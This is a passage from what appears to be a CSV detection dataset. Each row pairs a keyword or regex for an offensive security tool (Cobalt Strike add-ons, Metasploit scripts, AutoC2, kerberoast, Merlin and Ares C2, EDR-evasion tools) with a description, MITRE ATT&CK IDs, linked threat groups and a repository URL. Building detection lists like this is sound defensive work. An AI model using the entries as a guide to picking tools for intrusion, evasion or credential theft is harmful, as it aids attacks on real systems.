measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","127","26","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*ausecwa/bof-registry*",".{0,1000}ausecwa\/bof\-registry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*auth/cc2_ssh.*",".{0,1000}auth\/cc2_ssh\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*Authenticated returns if the Agent is authenticated to the Merlin server or not*",".{0,1000}Authenticated\sreturns\sif\sthe\sAgent\sis\sauthenticated\sto\sthe\sMerlin\sserver\sor\snot.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*Author : Podalirius (@podalirius_)*",".{0,1000}Author\s\s\s\s\s\s\s\s\s\s\s\s\s\:\sPodalirius\s\(\@podalirius_\).{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*Author => Hossam Ehab / EDR/AV evasion tool*",".{0,1000}Author\s\=\>\sHossam\sEhab\s\/\sEDR\/AV\sevasion\stool.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*Author: Hossam Ehab - facebook.com/0xHossam*",".{0,1000}Author\:\sHossam\sEhab\s\-\sfacebook\.com\/0xHossam.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*auto_brute.rc*",".{0,1000}auto_brute\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*auto_exploit_blank_password*",".{0,1000}auto_exploit_blank_password.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","253","30","2024-01-29T18:10:17Z","2022-08-12T22:16:46Z" "*auto_pass_the_hash.*",".{0,1000}auto_pass_the_hash\..{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*auto_pass_the_hash.rc*",".{0,1000}auto_pass_the_hash\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*auto_target_linux.rb*",".{0,1000}auto_target_linux\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*auto_target_windows.rb*",".{0,1000}auto_target_windows\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*autobloody -*",".{0,1000}autobloody\s\-.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*autobloody.py*",".{0,1000}autobloody\.py.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*autobloody-main*",".{0,1000}autobloody\-main.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*AutoBypass.ps1*",".{0,1000}AutoBypass\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*AutoC2.sh*",".{0,1000}AutoC2\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/All.sh*",".{0,1000}AutoC2\/All\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/C2*",".{0,1000}AutoC2\/C2.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Dependencies*",".{0,1000}AutoC2\/Dependencies.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Initial_Access*",".{0,1000}AutoC2\/Initial_Access.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Lateral.sh*",".{0,1000}AutoC2\/Lateral\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Payload_Development*",".{0,1000}AutoC2\/Payload_Development.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Recon*",".{0,1000}AutoC2\/Recon.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Situational_Awareness*",".{0,1000}AutoC2\/Situational_Awareness.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Social.sh*",".{0,1000}AutoC2\/Social\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Staging*",".{0,1000}AutoC2\/Staging.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Web.sh*",".{0,1000}AutoC2\/Web\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Wireless.sh*",".{0,1000}AutoC2\/Wireless\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Wordlists*",".{0,1000}AutoC2\/Wordlists.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoCompletionHandlerC2ServerManager*",".{0,1000}AutoCompletionHandlerC2ServerManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*autodiscover/brute.go*",".{0,1000}autodiscover\/brute\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*autoexploit.rc*",".{0,1000}autoexploit\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*autokerberoast.ps1*",".{0,1000}autokerberoast\.ps1.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autokerberoast_noMimikatz.ps1",".{0,1000}autokerberoast_noMimikatz\.ps1","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autoKirbi2hashcat.py*",".{0,1000}autoKirbi2hashcat\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autolace.twilightparadox.com*",".{0,1000}autolace\.twilightparadox\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*automachine.servequake.com*",".{0,1000}automachine\.servequake\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*AutoNSE*",".{0,1000}AutoNSE.{0,1000}","offensive_tool_keyword","autonse","Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmaps most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap. or write their own to meet custom needs. For more informations https://nmap.org/book/man-nse.html","T1059.001 - T1059.003 - T1059.005 - T1059.006 - T1027 - T1064 - T1086 - T1085","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/m4ll0k/AutoNSE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*autopwn*",".{0,1000}autopwn.{0,1000}","offensive_tool_keyword","autopwn","tools for pentester. autopwn is designed to make a pentesters life easier and more consistent by allowing them to specify tools they would like to run against targets. without having to type them in a shell or write a script. This tool will probably be useful during certain exams as well..","T1583 - T1059 - T1216 - T1053 - T1027","TA0002 - TA0008 - TA0003","N/A","N/A","Exploitation tools","https://github.com/nccgroup/autopwn","1","1","N/A","N/A","4","376","90","2019-04-23T09:58:28Z","2015-02-23T08:18:01Z" "*AutoRDPwn*",".{0,1000}AutoRDPwn.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*autorecon -t *",".{0,1000}autorecon\s\-t\s.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*AutoRecon\autorecon.py*",".{0,1000}AutoRecon\\autorecon\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*AutoSmuggle.csproj*",".{0,1000}AutoSmuggle\.csproj.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*AutoSmuggle.exe*",".{0,1000}AutoSmuggle\.exe.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*AutoSmuggle.sln*",".{0,1000}AutoSmuggle\.sln.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*AutoSmuggle-master*",".{0,1000}AutoSmuggle\-master.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*autostart/ares.desktop*",".{0,1000}autostart\/ares\.desktop.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*AutoSUID-main.*",".{0,1000}AutoSUID\-main\..{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","1","N/A","7","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*autoTGS_NtlmCrack.py*",".{0,1000}autoTGS_NtlmCrack\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autotimeline *",".{0,1000}autotimeline\s.{0,1000}","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","0","N/A","N/A","2","121","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*autotimeline.py*",".{0,1000}autotimeline\.py.{0,1000}","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","121","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*autotimeliner.git*",".{0,1000}autotimeliner\.git.{0,1000}","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","121","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*aux/dump_credentials*",".{0,1000}aux\/dump_credentials.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*aux/enum_system.rc*",".{0,1000}aux\/enum_system\.rc.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*aux/msf/*",".{0,1000}aux\/msf\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*aux/persistence.rc",".{0,1000}aux\/persistence\.rc","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation 